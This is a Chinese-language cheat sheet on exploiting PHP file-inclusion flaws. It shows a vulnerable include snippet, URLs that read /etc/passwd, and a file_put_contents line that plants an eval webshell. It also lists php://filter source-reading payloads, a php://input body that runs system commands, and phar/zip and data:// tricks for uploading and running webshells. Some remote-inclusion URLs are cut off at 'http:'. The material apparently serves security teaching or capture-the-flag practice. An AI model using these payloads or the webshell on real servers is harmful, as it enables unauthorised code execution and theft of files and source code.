本地文件包含
源代码
$filename=$_GET['filename'];
include $filename;
echo "欢迎来到php世界";
利用条件
- php.ini 的 allow_url_fopen=On (默认开启)
- 用户参数可控且后台代码没有对包含的文件进行过滤
利用方式
http://192.168.159.128/php/file.php?filename=ss.php&name=duyun
http://192.168.159.128/php/file.php?filename=/etc/passwd
http://192.168.159.128/php/file.php?filename=login.phtml
require、include包含文件都按照以PHP的后缀进行处理,按照PHP代码进行执行比如test.txt里面有小马,会进行执行代码
远程文件包含
利用条件
- php.ini 的 allow_url_fopen=On (默认开启) 和 allow_url_include=On (默认关闭)
- 用户参数可控且后台代码没有对包含的文件进行过滤
利用方法
http:
http:
上传木马
file_put_contents("/opt/temp/muma.php",'<?php @eval($_GET[["code"]]);?>');
http:
PHP伪协议
伪协议介绍
file:// - 访问本地文件系统
http:// -访问http(s)网页
ftp:// -访问ftp(s)URLS
php:// -访问各个输入输出流
zlib:// -压缩流
data:// -数据
glob:// -查找匹配的文件路径模式
phar:// -PHP 归档
ssh2:// -secure shell 2
rar:// -RAR
ogg:// -音频流
expect://-处理交互式的流
php://是一种伪协议,主要是开启了一个输入输出流,理解为文件数据传输的一个通道
常见的伪协议:php://input、php://filter、phar://
php://filter – 读取源码
打开数据流,把里面的内容以base64编码或者其他编码的方式读取出来
使用 convert.iconv.[]过滤器,[]中支持以下字符编码(* 表示该编码也可以在正则表达式中使用)
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
\\具体支持的编码可见php官方文档
\\https://www.php.net/manual/zh/mbstring.supported-encodings.php
php://filter/read/convert.base64-encode/resource=flag.php
php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php
php://input – POST输入
需要打开allow_url_include=On 相当于一个文件包含的利用
php://打开文件流后,直接在流里面写入我们的恶意代码,此时执行恶意代码(POST请求)
<?php system('ip addr')?>
phar:// – 压缩文件
主要用于在php中对压缩文件格式的读取。通常配合文件上传漏洞使用
使用:把一句话木马压缩成zip格式,然后再上传到服务器
http://xxxxxx/xx/file=phar://shell.zip/shell.txt
要给目标服务器写入一个文件,直接上传至服务器或者进入命令行去攻击服务器上下载
zip://
也是对压缩文件的读取,和phar有区别
http://xxxxxx/xx/file=phar://shell.zip%23shell.txt
data://
本身是数据流封装器,其原理和用法和php://input相似,但是发送GET请求
data://text/plain,<?php phpinfo();?>
data://text/plain;base64, (后面的?>要省去不写)
|